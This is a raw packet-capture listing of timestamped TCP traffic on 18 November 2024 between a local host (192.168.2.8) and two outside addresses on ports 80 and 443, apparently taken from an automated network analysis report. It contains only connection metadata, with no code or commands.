                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.078224897 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.078243017 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.078247070 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.078260899 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.078262091 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.078282118 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.078294992 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.078600883 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.078643084 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.078722000 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.078739882 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.078758955 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.078774929 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:28.636518002 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:28.636652946 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:31.153954029 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:31.154056072 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:31.154167891 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:31.612457037 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:31.612494946 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:32.743472099 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:32.743556023 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:32.746320963 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:32.746331930 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:32.746578932 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:32.787580967 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.039555073 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.087321043 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.257428885 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.257456064 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.257518053 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.257543087 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.303175926 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.325649977 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.376274109 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.376295090 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.376368999 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.376377106 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.376420975 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.377940893 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.377954006 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.377990961 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.377995014 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.378021955 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.378038883 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.495218992 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.495254993 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.495309114 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.495359898 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.495373964 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.496762991 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.496831894 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.496855021 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.537586927 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.619513988 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.619546890 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.619615078 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.619683981 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.619713068 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.621139050 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.621206999 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.621221066 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.621238947 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.621278048 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.662602901 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.737431049 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.737473965 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.737548113 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.737576962 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.737622023 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.738537073 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.738557100 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.738615990 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.738629103 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.787611008 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.855562925 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.855581045 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.855616093 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.855653048 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.855688095 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.856345892 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.856359005 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.856386900 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.856403112 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.856456041 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.974054098 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.974071026 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.974163055 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.974194050 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.975366116 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.975411892 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.975433111 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.975452900 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.975467920 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.977140903 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.977204084 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.977216959 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.021966934 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.094059944 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.094079018 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.094167948 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.094189882 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.094247103 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.095643997 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.095657110 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.095724106 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.095740080 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.146960974 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.212224007 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.212245941 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.212280989 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.212342024 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.212438107 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.214010954 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.214020014 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.214046955 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.214091063 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.214124918 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.746579885 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.746598005 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.746670008 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.746697903 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.748100042 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.748169899 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.748176098 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.749706030 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.749771118 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.749775887 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.751961946 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.752031088 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.752041101 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.753739119 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.753818035 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.753823996 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.754502058 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.754559994 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.754565954 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.756922960 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.757010937 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.757018089 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.758631945 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.758708000 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.758713961 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.759406090 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.759468079 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.759474993 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.760373116 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.760440111 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.760446072 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.761344910 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.761404991 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.761411905 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.763127089 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.763180971 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.763191938 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.803240061 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.808626890 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.808640957 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.808729887 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.808744907 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.811439991 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.811451912 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.811533928 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.811554909 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.853852034 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.853955984 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.853995085 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.896986008 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.947175980 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.947191954 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.947235107 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.947274923 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.947397947 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.947561026 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.947571993 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.947613955 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.947626114 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.947679996 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.949371099 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.949382067 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.949476957 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.949513912 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.990715981 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.046459913 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.046480894 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.046575069 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.046581030 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.046638012 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.047960043 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.047985077 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.048049927 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.048079014 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.048094988 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.065311909 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.065434933 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.065435886 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.065469027 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.065521002 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.092310905 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.092328072 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.092396975 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.092417002 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.092506886 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.165621042 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.165636063 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.165704012 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.165736914 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.184079885 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.184165001 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.184190035 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.185286045 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.185349941 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.185354948 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.185365915 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.185420990 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.283838987 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.283999920 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.284038067 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.302696943 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.302798033 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.302828074 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.303158045 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.303168058 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.303255081 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.303267002 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.330039024 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.330137968 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.330167055 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.381381035 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.403728008 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.403745890 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.403789997 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.403832912 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.403908014 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.425348997 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.425389051 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.425411940 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.425441027 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.425501108 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.425532103 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.426902056 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.426923037 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.426974058 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.426991940 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.427021980 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.448919058 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.448935032 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.449043036 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.449093103 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.490794897 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.522819042 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.522834063 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.522876978 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.522905111 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.522960901 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.544769049 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.544785023 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.544866085 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.544887066 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.545362949 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.545372963 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.545434952 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.545444965 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.546941996 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.546999931 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.547032118 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.547044992 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.547063112 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.600115061 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.641374111 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.641410112 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.641448021 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.641508102 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.641551971 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.663116932 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.663130999 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.663243055 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.663266897 CET44349706142.215.209.78192.168.2.8
